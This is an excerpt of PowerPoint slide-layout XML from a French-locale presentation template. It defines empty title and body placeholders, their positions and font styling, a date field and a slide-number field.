          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="388260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35" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="1122480"/>
            <a:ext cx="388260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36" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="2804040"/>
            <a:ext cx="388260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37" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="2804040"/>
            <a:ext cx="388260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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="256176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40" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2984040" y="1122480"/>
            <a:ext cx="256176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41" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674320" y="1122480"/>
            <a:ext cx="256176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42" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="2804040"/>
            <a:ext cx="256176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43" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2984040" y="2804040"/>
            <a:ext cx="256176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44" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674320" y="2804040"/>
            <a:ext cx="256176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88" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="7956360" cy="321912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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="7956360" cy="321912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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="3882600" cy="321912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194" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="1122480"/>
            <a:ext cx="3882600" cy="321912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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>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6" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="178920"/>
            <a:ext cx="7955280" cy="245772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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="388260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199" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="1122480"/>
            <a:ext cx="3882600" cy="321912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200" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="2804040"/>
            <a:ext cx="388260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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="7956360" cy="3219120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="3200" b="0" strike="noStrike" spc="-1" dirty="0">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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="3882600" cy="321912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203" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="1122480"/>
            <a:ext cx="388260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204" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="2804040"/>
            <a:ext cx="388260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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="388260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207" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="1122480"/>
            <a:ext cx="388260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208" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="2804040"/>
            <a:ext cx="795636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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="795636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211" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="2804040"/>
            <a:ext cx="795636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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="388260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214" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="1122480"/>
            <a:ext cx="388260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215" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="2804040"/>
            <a:ext cx="388260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216" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="2804040"/>
            <a:ext cx="388260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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="256176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219" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2984040" y="1122480"/>
            <a:ext cx="256176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220" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674320" y="1122480"/>
            <a:ext cx="256176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221" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="2804040"/>
            <a:ext cx="256176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222" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2984040" y="2804040"/>
            <a:ext cx="256176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223" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674320" y="2804040"/>
            <a:ext cx="256176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dt" idx="6"/>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C04427-7D3E-827C-CB80-BF765124EEAD}"/>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id="{74ED3480-AF31-6CEC-001B-CFA4F88E409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9277A19-AC5A-032E-2B61-2F2C0EDA0C10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6A50580D-E926-4F9F-A73F-5C498B96FC0F}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>08/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du pied de page 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6509DDF-8059-93CF-C434-778CF1291E1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7FE9536-67B7-EE28-B4B1-A6AC91410949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94BEFB54-C7E7-4F60-B06D-D7E9873B64BC}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="576641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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="7956360" cy="3219120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="3882600" cy="321912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15" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="1122480"/>
            <a:ext cx="3882600" cy="321912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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>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293760" y="178920"/>
            <a:ext cx="7955280" cy="245772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93760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="PlaceHolder 2"/>
          <p:cNvSpPr>
